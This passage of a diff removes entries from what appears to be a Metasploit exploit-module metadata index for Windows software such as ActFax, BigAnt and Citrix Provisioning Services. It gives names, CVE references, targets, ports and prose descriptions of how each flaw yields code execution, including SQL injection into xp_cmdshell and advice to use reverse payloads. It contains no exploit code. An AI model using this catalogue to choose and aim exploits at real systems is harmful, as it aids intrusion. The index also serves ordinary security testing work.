used to transfer fax messages without any underlying protocols. To\n note significant fields in the fax being transferred, like the fax number or the\n recipient, ActFax data fields can be used. This module exploits a buffer overflow\n in the handling of the @F506 fields due to the insecure usage of strcpy. This\n module has been tested successfully on ActFax 5.01 over Windows XP SP3 (English).", - "references": [ - "OSVDB-89944", - "BID-57789", - "EDB-24467", - "URL-http://www.pwnag3.com/2013/02/actfax-raw-server-exploit.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "ActFax 5.01 / Windows XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/actfax_raw_server_bof.rb", - "is_install_path": true, - "ref_name": "windows/misc/actfax_raw_server_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/agentxpp_receive_agentx": { - "name": "AgentX++ Master AgentX::receive_agentx Stack Buffer Overflow", - "fullname": "exploit/windows/misc/agentxpp_receive_agentx", - "aliases": [], - "rank": 400, - "disclosure_date": "2010-04-16", - "type": "exploit", - "author": [ - "jduck " - ], - "description": "This exploits a stack buffer overflow in the AgentX++ library, as used by\n various applications. By sending a specially crafted request, an attacker can\n execute arbitrary code, potentially with SYSTEM privileges.\n\n This module was tested successfully against master.exe as included with Real\n Network\\'s Helix Server v12. When installed as a service with Helix Server,\n the service runs as SYSTEM, has no recovery action, but will start automatically\n on boot.\n\n This module does not work with NX/XD enabled but could be modified easily to\n do so. The address", - "references": [ - "CVE-2010-1318", - "OSVDB-63919", - "URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=867" - ], - "platform": "Windows", - "arch": "", - "rport": 705, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Helix Server v12 and v13 - master.exe" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/agentxpp_receive_agentx.rb", - "is_install_path": true, - "ref_name": "windows/misc/agentxpp_receive_agentx", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/ahsay_backup_fileupload": { - "name": "Ahsay Backup v7.x-v8.1.1.50 (authenticated) file upload", - "fullname": "exploit/windows/misc/ahsay_backup_fileupload", - "aliases": [], - "rank": 600, - "disclosure_date": "2019-06-01", - "type": "exploit", - "author": [ - "Wietse Boonstra" - ], - "description": "This module exploits an authenticated insecure file upload and code\n execution flaw in Ahsay Backup v7.x - v8.1.1.50. To succesfully execute\n the upload credentials are needed, default on Ahsay Backup trial\n accounts are enabled so an account can be created.\n\n It can be exploited in Windows and Linux environments to get remote code\n execution (usualy as SYSTEM). This module has been tested successfully\n on Ahsay Backup v8.1.1.50 with Windows 2003 SP2 Server. Because of this\n flaw all connected clients can be configured to execute a command before\n the backup starts. Allowing an attacker to takeover even more systems\n and make it rain shells!\n\n Setting the CREATEACCOUNT to true will create a new account, this is\n enabled by default.\n If credeantials are known enter these and run the exploit.", - "references": [ - "CVE-2019-10267", - "URL-https://www.wbsec.nl/ahsay/", - "URL-http://ahsay-dn.ahsay.com/v8/81150/cbs-win.exe" - ], - "platform": "Windows", - "arch": "", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows x86", - "Linux x86" - ], - "mod_time": "2020-12-23 11:36:38 +0000", - "path": "/modules/exploits/windows/misc/ahsay_backup_fileupload.rb", - "is_install_path": true, - "ref_name": "windows/misc/ahsay_backup_fileupload", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/misc/ais_esel_server_rce": { - "name": "AIS logistics ESEL-Server Unauth SQL Injection RCE", - "fullname": "exploit/windows/misc/ais_esel_server_rce", - "aliases": [], - "rank": 600, - "disclosure_date": "2019-03-27", - "type": "exploit", - "author": [ - "Manuel Feifel" - ], - "description": "This module will execute an arbitrary payload on an \"ESEL\" server used by the\n AIS logistic software. The server typically listens on port 5099 without TLS.\n There could also be server listening on 5100 with TLS but the port 5099 is\n usually always open.\n The login process is vulnerable to an SQL Injection. Usually a MSSQL Server\n with the 'sa' user is in place.\n\n This module was verified on version 67 but it should also run on lower versions.\n An fixed version was created by AIS in September 2017. However most systems\n have not been updated.\n\n In regard to the payload, unless there is a closed port in the web server,\n you dont want to use any \"bind\" payload. You want a \"reverse\" payload,\n probably to your port 80 or to any other outbound port allowed on the firewall.\n\n Currently, one delivery method is supported\n\n This method takes advantage of the Command Stager subsystem. This allows using\n various techniques, such as using a TFTP server, to send the executable. By default\n the Command Stager uses 'wcsript.exe' to generate the executable on the target.\n\n NOTE: This module will leave a payload executable on the target system when the\n attack is finished.", - "references": [ - "CVE-2019-10123" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": 5099, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-06-10 11:44:55 +0000", - "path": "/modules/exploits/windows/misc/ais_esel_server_rce.rb", - "is_install_path": true, - "ref_name": "windows/misc/ais_esel_server_rce", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/allmediaserver_bof": { - "name": "ALLMediaServer 0.8 Buffer Overflow", - "fullname": "exploit/windows/misc/allmediaserver_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-07-04", - "type": "exploit", - "author": [ - "motaz reda ", - "modpr0be ", - "juan vazquez " - ], - "description": "This module exploits a stack buffer overflow in ALLMediaServer 0.8. The vulnerability\n is caused due to a boundary error within the handling of HTTP request.\n\n While the exploit supports DEP bypass via ROP, on Windows 7 the stack pivoting isn't\n reliable across virtual (VMWare, VirtualBox) and physical environments. Because of\n this the module isn't using DEP bypass on the Windows 7 SP1 target, where by default\n DEP is OptIn and AllMediaServer won't run with DEP.", - "references": [ - "CVE-2017-17932", - "OSVDB-83889", - "EDB-19625" - ], - "platform": "Windows", - "arch": "", - "rport": 888, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "ALLMediaServer 0.8 / Windows XP SP3 - English", - "ALLMediaServer 0.8 / Windows 7 SP1 - English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/allmediaserver_bof.rb", - "is_install_path": true, - "ref_name": "windows/misc/allmediaserver_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/altiris_ds_sqli": { - "name": "Symantec Altiris DS SQL Injection", - "fullname": "exploit/windows/misc/altiris_ds_sqli", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-05-15", - "type": "exploit", - "author": [ - "Brett Moore", - "3v0lver" - ], - "description": "This module exploits a SQL injection flaw in Symantec Altiris Deployment Solution 6.8\n to 6.9.164. The vulnerability exists on axengine.exe which fails to adequately sanitize\n numeric input fields in \"UpdateComputer\" notification Requests. In order to spawn a shell,\n several SQL injections are required in close succession, first to enable xp_cmdshell, then\n retrieve the payload via TFTP and finally execute it. The module also has the capability\n to disable or enable local application authentication. In order to work the target system\n must have a tftp client available.", - "references": [ - "CVE-2008-2286", - "OSVDB-45313", - "BID-29198", - "URL-http://www.zerodayinitiative.com/advisories/ZDI-08-024" - ], - "platform": "Windows", - "arch": "", - "rport": 402, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2003 (with tftp client available)" - ], - "mod_time": "2022-06-29 19:10:52 +0000", - "path": "/modules/exploits/windows/misc/altiris_ds_sqli.rb", - "is_install_path": true, - "ref_name": "windows/misc/altiris_ds_sqli", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/misc/apple_quicktime_rtsp_response": { - "name": "Apple QuickTime 7.3 RTSP Response Header Buffer Overflow", - "fullname": "exploit/windows/misc/apple_quicktime_rtsp_response", - "aliases": [], - "rank": 300, - "disclosure_date": "2007-11-23", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Apple QuickTime 7.3. By sending an overly long\n RTSP response to a client, an attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2007-6166", - "OSVDB-40876", - "BID-26549", - "EDB-4648" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "QuickTime 7.3, QuickTime Player 7.3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb", - "is_install_path": true, - "ref_name": "windows/misc/apple_quicktime_rtsp_response", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/asus_dpcproxy_overflow": { - "name": "Asus Dpcproxy Buffer Overflow", - "fullname": "exploit/windows/misc/asus_dpcproxy_overflow", - "aliases": [], - "rank": 200, - "disclosure_date": "2008-03-21", - "type": "exploit", - "author": [ - "Jacopo Cervini" - ], - "description": "This module exploits a stack buffer overflow in Asus Dpcroxy version 2.0.0.19.\n It should be vulnerable until version 2.0.0.24.\n Credit to Luigi Auriemma", - "references": [ - "CVE-2008-1491", - "OSVDB-43638", - "BID-28394" - ], - "platform": "Windows", - "arch": "", - "rport": 623, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Asus Dpcroxy version 2.00.19 Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/asus_dpcproxy_overflow.rb", - "is_install_path": true, - "ref_name": "windows/misc/asus_dpcproxy_overflow", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/avaya_winpmd_unihostrouter": { - "name": "Avaya WinPMD UniteHostRouter Buffer Overflow", - "fullname": "exploit/windows/misc/avaya_winpmd_unihostrouter", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-05-23", - "type": "exploit", - "author": [ - "AbdulAziz Hariri", - "Unknown", - "juan vazquez " - ], - "description": "This module exploits a stack buffer overflow in Avaya WinPMD. The vulnerability\n exists in the UniteHostRouter service, due to the insecure usage of memcpy when\n parsing specially crafted \"To:\" headers. The module has been tested successfully on\n Avaya WinPMD 3.8.2 over Windows XP SP3 and Windows 2003 SP2.", - "references": [ - "OSVDB-82764", - "OSVDB-73269", - "BID-47947", - "EDB-18397", - "URL-https://downloads.avaya.com/css/P8/documents/100140122", - "URL-http://web.archive.org/web/20110527165515/http://secunia.com:80/advisories/44062" - ], - "platform": "Windows", - "arch": "", - "rport": 3217, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Avaya WinPMD 3.8.2 / Windows XP SP3", - "Avaya WinPMD 3.8.2 / Windows 2003 SP2" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/misc/avaya_winpmd_unihostrouter.rb", - "is_install_path": true, - "ref_name": "windows/misc/avaya_winpmd_unihostrouter", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/avidphoneticindexer": { - "name": "Avid Media Composer 5.5 - Avid Phonetic Indexer Buffer Overflow", - "fullname": "exploit/windows/misc/avidphoneticindexer", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-11-29", - "type": "exploit", - "author": [ - "vt [nick.freeman " - ], - "description": "This module exploits a stack buffer overflow in process\n AvidPhoneticIndexer.exe (port 4659), which comes as part of the Avid Media Composer\n 5.5 Editing Suite. This daemon sometimes starts on a different port; if you start\n it standalone it will run on port 4660.", - "references": [ - "CVE-2011-5003", - "OSVDB-77376", - "URL-http://www.security-assessment.com/files/documents/advisory/Avid_Media_Composer-Phonetic_Indexer-Remote_Stack_Buffer_Overflow.pdf" - ], - "platform": "Windows", - "arch": "", - "rport": 4659, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP Professional SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/avidphoneticindexer.rb", - "is_install_path": true, - "ref_name": "windows/misc/avidphoneticindexer", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/bakbone_netvault_heap": { - "name": "BakBone NetVault Remote Heap Overflow", - "fullname": "exploit/windows/misc/bakbone_netvault_heap", - "aliases": [], - "rank": 200, - "disclosure_date": "2005-04-01", - "type": "exploit", - "author": [ - "hdm ", - "nolimit.bugtraq " - ], - "description": "This module exploits a heap overflow in the BakBone NetVault\n Process Manager service. This code is a direct port of the netvault.c\n code written by nolimit and BuzzDee.", - "references": [ - "CVE-2005-1009", - "OSVDB-15234", - "BID-12967" - ], - "platform": "Windows", - "arch": "", - "rport": 20031, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows 2000 SP4 English", - "Windows XP SP0/SP1 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/bakbone_netvault_heap.rb", - "is_install_path": true, - "ref_name": "windows/misc/bakbone_netvault_heap", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/bcaaa_bof": { - "name": "Blue Coat Authentication and Authorization Agent (BCAAA) 5 Buffer Overflow", - "fullname": "exploit/windows/misc/bcaaa_bof", - "aliases": [], - "rank": 400, - "disclosure_date": "2011-04-04", - "type": "exploit", - "author": [ - "Paul Harrington", - "Travis Warren", - "sinn3r " - ], - "description": "This module exploits a stack buffer overflow in process bcaaa-130.exe (port 16102),\n which comes as part of the Blue Coat Authentication proxy. Please note that by default,\n this exploit will attempt up to three times in order to successfully gain remote code\n execution (in some cases, it takes as many as five times). This can cause your activity\n to look even more suspicious. To modify the number of exploit attempts, set the\n ATTEMPTS option.", - "references": [ - "CVE-2011-5124", - "OSVDB-72095", - "URL-https://kb.bluecoat.com/index?page=content&id=SA55", - "URL-https://seclists.org/bugtraq/2011/Jul/44" - ], - "platform": "Windows", - "arch": "", - "rport": 16102, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "BCAAA Version 5.4.6.1.54128" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/bcaaa_bof.rb", - "is_install_path": true, - "ref_name": "windows/misc/bcaaa_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/bigant_server": { - "name": "BigAnt Server 2.2 Buffer Overflow", - "fullname": "exploit/windows/misc/bigant_server", - "aliases": [], - "rank": 200, - "disclosure_date": "2008-04-15", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in BigAnt Server 2.2.\n By sending a specially crafted packet, an attacker may be\n able to execute arbitrary code.", - "references": [ - "CVE-2008-1914", - "OSVDB-44454", - "BID-28795" - ], - "platform": "Windows", - "arch": "", - "rport": 6080, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 Pro All English", - "Windows XP Pro SP0/SP1 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/bigant_server.rb", - "is_install_path": true, - "ref_name": "windows/misc/bigant_server", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/bigant_server_250": { - "name": "BigAnt Server 2.50 SP1 Buffer Overflow", - "fullname": "exploit/windows/misc/bigant_server_250", - "aliases": [], - "rank": 500, - "disclosure_date": "2008-04-15", - "type": "exploit", - "author": [ - "Dr_IDE " - ], - "description": "This exploits a stack buffer overflow in the BigAnt Messaging Service,\n part of the BigAnt Server product suite. This module was tested\n successfully against version 2.50 SP1.", - "references": [ - "CVE-2008-1914", - "OSVDB-44454", - "EDB-9673", - "EDB-9690" - ], - "platform": "Windows", - "arch": "", - "rport": 6660, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "BigAnt 2.5 Universal", - "Windows 2000 Pro All English", - "Windows XP Pro SP0/SP1 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/bigant_server_250.rb", - "is_install_path": true, - "ref_name": "windows/misc/bigant_server_250", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/bigant_server_dupf_upload": { - "name": "BigAnt Server DUPF Command Arbitrary File Upload", - "fullname": "exploit/windows/misc/bigant_server_dupf_upload", - "aliases": [], - "rank": 600, - "disclosure_date": "2013-01-09", - "type": "exploit", - "author": [ - "Hamburgers Maccoy", - "juan vazquez " - ], - "description": "This exploits an arbitrary file upload vulnerability in BigAnt Server 2.97 SP7.\n A lack of authentication allows to make unauthenticated file uploads through a DUPF\n command. Additionally the filename option in the same command can be used to launch\n a directory traversal attack and achieve arbitrary file upload.\n\n The module uses the Windows Management Instrumentation service to execute an\n arbitrary payload on vulnerable installations of BigAnt on Windows XP and 2003. It\n has been successfully tested on BigAnt Server 2.97 SP7 over Windows XP SP3 and 2003\n SP2.", - "references": [ - "CVE-2012-6274", - "US-CERT-VU-990652", - "BID-57214", - "OSVDB-89342" - ], - "platform": "Windows", - "arch": "", - "rport": 6661, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "BigAnt Server 2.97 SP7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/bigant_server_dupf_upload.rb", - "is_install_path": true, - "ref_name": "windows/misc/bigant_server_dupf_upload", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/misc/bigant_server_sch_dupf_bof": { - "name": "BigAnt Server 2 SCH And DUPF Buffer Overflow", - "fullname": "exploit/windows/misc/bigant_server_sch_dupf_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-01-09", - "type": "exploit", - "author": [ - "Hamburgers Maccoy", - "juan vazquez " - ], - "description": "This exploits a stack buffer overflow in BigAnt Server 2.97 SP7. The\n vulnerability is due to the dangerous usage of strcpy while handling errors. This\n module uses a combination of SCH and DUPF request to trigger the vulnerability, and\n has been tested successfully against version 2.97 SP7 over Windows XP SP3 and\n Windows 2003 SP2.", - "references": [ - "CVE-2012-6275", - "US-CERT-VU-990652", - "BID-57214", - "OSVDB-89344" - ], - "platform": "Windows", - "arch": "", - "rport": 6661, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "BigAnt Server 2.97 SP7 / Windows XP SP3", - "BigAnt Server 2.97 SP7 / Windows 2003 SP2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/bigant_server_sch_dupf_bof.rb", - "is_install_path": true, - "ref_name": "windows/misc/bigant_server_sch_dupf_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/bigant_server_usv": { - "name": "BigAnt Server 2.52 USV Buffer Overflow", - "fullname": "exploit/windows/misc/bigant_server_usv", - "aliases": [], - "rank": 500, - "disclosure_date": "2009-12-29", - "type": "exploit", - "author": [ - "Lincoln", - "DouBle_Zer0", - "jduck " - ], - "description": "This exploits a stack buffer overflow in the BigAnt Messaging Service,\n part of the BigAnt Server product suite. This module was tested\n successfully against version 2.52.\n\n NOTE: The AntServer service does not restart, you only get one shot.", - "references": [ - "CVE-2009-4660", - "OSVDB-61386", - "EDB-10765", - "EDB-10973" - ], - "platform": "Windows", - "arch": "", - "rport": 6660, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "BigAnt 2.52 Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/bigant_server_usv.rb", - "is_install_path": true, - "ref_name": "windows/misc/bigant_server_usv", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/bomberclone_overflow": { - "name": "Bomberclone 0.11.6 Buffer Overflow", - "fullname": "exploit/windows/misc/bomberclone_overflow", - "aliases": [], - "rank": 200, - "disclosure_date": "2006-02-16", - "type": "exploit", - "author": [ - "Jacopo Cervini " - ], - "description": "This module exploits a stack buffer overflow in Bomberclone 0.11.6 for Windows.\n The return address is overwritten with lstrcpyA memory address,\n the second and third value are the destination buffer,\n the fourth value is the source address of our buffer in the stack.\n This exploit is like a return in libc.\n\n ATTENTION\n The shellcode is exec ONLY when someone try to close bomberclone.", - "references": [ - "CVE-2006-0460", - "OSVDB-23263", - "BID-16697" - ], - "platform": "Windows", - "arch": "", - "rport": 11000, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows XP SP2 Italian", - "Windows 2000 SP1 English", - "Windows 2000 SP1 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/bomberclone_overflow.rb", - "is_install_path": true, - "ref_name": "windows/misc/bomberclone_overflow", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/bopup_comm": { - "name": "Bopup Communications Server Buffer Overflow", - "fullname": "exploit/windows/misc/bopup_comm", - "aliases": [], - "rank": 400, - "disclosure_date": "2009-06-18", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Bopup Communications Server 3.2.26.5460.\n By sending a specially crafted packet, an attacker may be\n able to execute arbitrary code.", - "references": [ - "CVE-2009-2227", - "OSVDB-55275", - "URL-http://www.blabsoft.com/products/server", - "EDB-9002" - ], - "platform": "Windows", - "arch": "", - "rport": 19810, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Bopup Communications Server 3.2.26.5460" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/bopup_comm.rb", - "is_install_path": true, - "ref_name": "windows/misc/bopup_comm", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/borland_interbase": { - "name": "Borland Interbase Create-Request Buffer Overflow", - "fullname": "exploit/windows/misc/borland_interbase", - "aliases": [], - "rank": 200, - "disclosure_date": "2007-07-24", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Borland Interbase 2007.\n By sending a specially crafted create-request packet, a remote\n attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2007-3566", - "OSVDB-38602", - "URL-http://dvlabs.tippingpoint.com/advisory/TPTI-07-13" - ], - "platform": "Windows", - "arch": "", - "rport": 3050, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 English All / Borland InterBase 2007" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/borland_interbase.rb", - "is_install_path": true, - "ref_name": "windows/misc/borland_interbase", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/borland_starteam": { - "name": "Borland CaliberRM StarTeam Multicast Service Buffer Overflow", - "fullname": "exploit/windows/misc/borland_starteam", - "aliases": [], - "rank": 200, - "disclosure_date": "2008-04-02", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Borland CaliberRM 2006. By sending\n a specially crafted GET request to the STMulticastService, an attacker may be\n able to execute arbitrary code.", - "references": [ - "CVE-2008-0311", - "OSVDB-44039", - "BID-28602" - ], - "platform": "Windows", - "arch": "", - "rport": 3057, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows 2000 SP4 English", - "Windows 2003 SP0 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/borland_starteam.rb", - "is_install_path": true, - "ref_name": "windows/misc/borland_starteam", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/citrix_streamprocess": { - "name": "Citrix Provisioning Services 5.6 streamprocess.exe Buffer Overflow", - "fullname": "exploit/windows/misc/citrix_streamprocess", - "aliases": [], - "rank": 400, - "disclosure_date": "2011-01-20", - "type": "exploit", - "author": [ - "mog" - ], - "description": "This module exploits a stack buffer overflow in Citrix Provisioning Services 5.6.\n By sending a specially crafted packet to the Provisioning Services server, a fixed\n length buffer on the stack can be overflowed and arbitrary code can be executed.", - "references": [ - "OSVDB-70597", - "ZDI-11-023", - "URL-http://web.archive.org/web/20110123164820/http://secunia.com:80/advisories/42954/", - "URL-http://support.citrix.com/article/CTX127149" - ], - "platform": "Windows", - "arch": "", - "rport": 6905, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3 / Windows Server 2003 SP2 / Windows Vista" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/misc/citrix_streamprocess.rb", - "is_install_path": true, - "ref_name": "windows/misc/citrix_streamprocess", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/citrix_streamprocess_data_msg": { - "name": "Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020000 Buffer Overflow", - "fullname": "exploit/windows/misc/citrix_streamprocess_data_msg", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-11-04", - "type": "exploit", - "author": [ - "AbdulAziz Hariri", - "alino <26alino@gmail.com>" - ], - "description": "This module exploits a remote buffer overflow in the Citrix Provisioning Services\n 5.6 SP1 (without Hotfix CPVS56SP1E043) by sending a malformed packet to the\n 6905/UDP port. The module has been successfully tested on Windows Server 2003 SP2,\n Windows 7, and Windows XP SP3.", - "references": [ - "OSVDB-75780", - "BID-49803", - "ZDI-12-009", - "URL-http://support.citrix.com/article/CTX130846" - ], - "platform": "Windows", - "arch": "", - "rport": 6905, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Citrix Provisioning Services 5.6 SP1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb", - "is_install_path": true, - "ref_name": "windows/misc/citrix_streamprocess_data_msg", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/citrix_streamprocess_get_boot_record_request": { - "name": "Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020004 Buffer Overflow", - "fullname": "exploit/windows/misc/citrix_streamprocess_get_boot_record_request", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-11-04", - "type": "exploit", - "author": [ - "alino <26alino@gmail.com>", - "juan vazquez " - ], - "description": "This module exploits a remote buffer overflow in the Citrix Provisioning Services\n 5.6 SP1 (without Hotfix CPVS56SP1E043) by sending a malformed packet with the opcode\n 0x40020004 (GetBootRecordRequest) to the 6905/UDP port. The module, which allows\n code execution under the context of SYSTEM, has been successfully tested on Windows Server\n 2003 SP2 and Windows XP SP3.", - "references": [ - "OSVDB-75780", - "BID-49803", - "URL-http://support.citrix.com/article/CTX130846" - ], - "platform": "Windows", - "arch": "", - "rport": 6905, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Citrix Provisioning Services 5.6 SP1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/citrix_streamprocess_get_boot_record_request.rb", - "is_install_path": true, - "ref_name": "windows/misc/citrix_streamprocess_get_boot_record_request", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/citrix_streamprocess_get_footer": { - "name": "Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020002 Buffer Overflow", - "fullname": "exploit/windows/misc/citrix_streamprocess_get_footer", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-11-04", - "type": "exploit", - "author": [ - "alino <26alino@gmail.com>", - "juan vazquez " - ], - "description": "This module exploits a remote buffer overflow in the Citrix Provisioning Services\n 5.6 SP1 (without Hotfix CPVS56SP1E043) by sending a malformed packet with the opcode\n 0x40020002 (GetFooterRequest) to the 6905/UDP port. The module, which allows code execution\n under the context of SYSTEM, has been successfully tested on Windows Server 2003 SP2\n and Windows XP SP3.", - "references": [ - "OSVDB-75780", - "BID-49803", - "URL-http://support.citrix.com/article/CTX130846" - ], - "platform": "Windows", - "arch": "", - "rport": 6905, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Citrix Provisioning Services 5.6 SP1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/citrix_streamprocess_get_footer.rb", - "is_install_path": true, - "ref_name": "windows/misc/citrix_streamprocess_get_footer", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/citrix_streamprocess_get_objects": { - "name": "Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020006 Buffer Overflow", - "fullname": "exploit/windows/misc/citrix_streamprocess_get_objects", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-11-04", - "type": "exploit", - "author": [ - "Anyway ", - "alino <26alino@gmail.com>", - "juan vazquez " - ], - "description": "This module exploits a remote buffer overflow in the Citrix Provisioning Services\n 5.6 SP1 (without Hotfix CPVS56SP1E043) by sending a malformed packet with the 